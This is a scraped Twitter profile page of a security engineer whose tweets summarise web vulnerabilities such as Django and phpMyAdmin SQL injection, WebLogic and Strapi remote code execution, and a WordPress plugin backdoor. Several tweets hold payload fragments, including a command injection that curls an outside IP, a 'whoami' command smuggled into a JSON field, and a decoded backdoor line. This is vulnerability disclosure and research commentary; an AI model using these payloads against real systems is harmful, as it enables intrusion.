Henry Chen

@chybeta

Security Engineer at Blog: Coffee :

Vrijeme pridruživanja: kolovoz 2017.

Medijski sadržaj

  1. prije 11 sati

    the citrix offer a tool to check CVE-2019-19781 if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response): => if True and True and ("name resolve order") in str(response): 🤔🤔🤔

  2. 3. velj

    CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:

  3. 16. sij

    CVE-2020-2551 WebLogic RCE via IIOP protocol.

  4. 15. sij

    CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:

  5. 10. sij

    find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor .

  6. 3. sij
  7. 2. sij

    CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method however there are lots of no-auth mongo-express ... shodan: poc:

  8. 29. pro 2019.

    Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks

  9. 10. pro 2019.
  10. 9. pro 2019.

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

  11. 5. pro 2019.

    CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}

  12. 3. pro 2019.

    CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration

  13. 3. pro 2019.

    Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability

  14. 2. pro 2019.
  15. 25. stu 2019.

    CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662

  16. 18. stu 2019.

    CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) jython xxx 18983 command super_secret "ls -la"

  17. 17. stu 2019.

    backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");

  18. 30. lis 2019.

    WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property Analsyis:

  19. 29. lis 2019.

    Build a simple bot to monitor HackerOne / BugCrowd / intigriti and so on. Just focus on new bug bounty program. For example, Logitech VDP(

  20. 23. lis 2019.

    NOTICE THIS TWEET : recommended configuration for nextcloud with nginx and php-fpm is vulnerable...

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·